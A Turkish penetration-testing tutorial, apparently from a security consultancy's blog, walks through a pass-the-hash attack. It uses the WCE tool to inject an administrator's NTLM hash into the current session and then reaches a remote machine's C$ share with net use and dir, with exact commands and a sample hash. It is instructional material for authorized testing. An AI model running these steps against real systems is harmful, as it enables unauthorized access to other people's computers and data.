WCE Aracının Yönetici Hesabına Ait Parola Özeti ile Kullanılarak Uzak Bilgisayarın Disk Sistemine Erişim Sağlanması

0
152
views
Sızma testleri sırasında bir bilgisayardan başka bir bilgisayara ait yöneticinin parola özeti elde edilebilmektedir. Bu yazıda, yönetici hesabına ait kimlik bilgisi elde edilen bir bilgisayarın disk sistemine, WCE aracı kullanılarak erişim sağlanacaktır.

Pentist: Sızma Testleri ve Bilgi Güvenliği Danışmanlık Hizmetleri

Varsayılan durumda bir bilgisayarın C: diskine uzaktan erişim sağlayabilmek için o bilgisayara ait bir yönetici hesabının kimlik bilgileri gerekmektedir.

connecting-network-drive-using-password-hashes-via-wce-tool-01

Bu bilgisayarda yönetici olan hesabın adının Vedat, Vedat kullanıcısının parola özetinin ise AAD3B435B51404EEAAD3B435B51404EE:FA320A5CF3D53B4E74BBAC73047186F2 olduğunu varsayalım. Bu bilgilerle, hedef sistemin disk sistemine erişim sağlamak için WCE aracı kullanılacaktır.

WCE aracının “-s” seçeneği ile, RAM üzerinde bulunan oturumun NTLM kimlik bilgileri değiştirilebilir. Normalde RAM üzerinde Saldirgan adlı hesabın parolasının açık hali ve özet hali bulunmaktadır:

wce -l
wce -w

connecting-network-drive-using-password-hashes-via-wce-tool-02

WCE aracı ile RAM üzerindeki oturuma ait NTLM bilgileri Vedat hesabına ait kimlik bilgileri (Kullanıcı adı ve parola özeti) ile değiştirilebilir. WCE aracı “-s” seçeneği ile çalıştırıldıktan sonra, Saldirgan hesabına ait parolanın NTLM özet bilgilerinin, Vedat’ın parolasına ait NTLM özet bilgileri ile değiştiği görülmektedir. Bunun yanında parolanın açık halinin değişmediği de görülmektedir.

wce -s WORKGROUP:Vedat:AAD3B435B51404EEAAD3B435B51404EE:FA320A5CF3D53B4E74BBAC73047186F2
wce -l
wce -w

connecting-network-drive-using-password-hashes-via-wce-tool-03

Hedef sistemin paylaşılan kaynaklarına (yönetimsel paylaşımlar) erişim sağlayabilmek için, öncelikle bağlantının kurulması gerekmektedir.

net use \\172.16.67.202\C$ /USER:WORKGROUP\Vedat
net use

connecting-network-drive-using-password-hashes-via-wce-tool-04

Bağlantı kurulduktan sonra, hedef sistemin disk sistemine komut satırından erişim sağlanabildiği görülmektedir.

dir \\172.16.67.202\C$

connecting-network-drive-using-password-hashes-via-wce-tool-05

Dosya sistemine arayüzden de bağlanabildiği görülmektedir.

connecting-network-drive-using-password-hashes-via-wce-tool-06

 

 

Pentist: Sızma Testleri ve Bilgi Güvenliği Danışmanlık Hizmetleri

CEVAP VER

Yorumunuzu giriniz
İsminizi giriniz

Bu site, istenmeyenleri azaltmak için Akismet kullanıyor. Yorum verilerinizin nasıl işlendiği hakkında daha fazla bilgi edinin.